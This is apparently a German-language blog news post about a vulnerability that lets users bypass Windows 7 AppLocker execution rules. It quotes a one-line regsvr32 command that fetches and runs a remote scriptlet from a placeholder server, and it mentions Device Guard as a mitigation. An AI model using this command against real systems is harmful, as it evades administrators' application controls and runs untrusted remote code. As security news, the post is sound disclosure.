Windows-Schwachstelle hebelt AppLocker aus

win7Eine Sicherheitslücke in Windows lässt sich ausnutzen, um von Administratoren gesetzte AppLocker-Ausführungsregeln für Anwendungen zu umgehen.


Anzeige

In Windows 7 und Windows Server 2008 R2 wurde die Funktion AppLocker vorgestellt. Unter Windows 7 ist diese nur in der Ultinate- und Enterprise-Variante nutzbar. Mit AppLocker können Administratoren Regeln festlegen, um Benutzern das Installieren oder Nutzen von Software zu erlauben oder zu verbieten.

Das Ganze ist aber nicht so ganz kollateralschädenfrei. Bereits im Artikel Was schützt vor Locky und anderer Ransomware? hatte ich auf den Hotfix KB2532445 (You can circumvent AppLocker rules by using an Office macro on a computer that is running Windows 7 or Windows Server 2008 R2) verwiesen, der eine Lücke in Office abdecken soll.

Jetzt ist Casey Smith aus Colorade per Zufall auf eine weitere Sicherheitslücke in AppLocker gestoßen, die er in diesem Blog-Beitrag dokumentiert hat. Mit einem einfachen Befehl:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

gelang es ihm, AppLocker auszuhebeln. Offenbar ist regsvr32 in den AppLocker-Anwendungsregeln in einer WhiteList enthalten. Ob eine Blockade des Befehls zu Windows-Funktionseinbußen führt, ist unklar. Bisher gibt es wohl keinen Patch, der die Lücke abdichtet. Hier findet sich ein Tweet, wo Device Guard als Lösung ausgeführt wird. Eine ausführlichere Betrachtung des Themas findet sich in diesem Artikel (englisch). (via)


Cookies blockieren entzieht uns die Finanzierung: Cookie-Einstellungen

Dieser Beitrag wurde unter Sicherheit, Windows 7 abgelegt und mit , , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Eine Antwort zu Windows-Schwachstelle hebelt AppLocker aus

Schreibe einen Kommentar zu Eddy Current Antworten abbrechen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.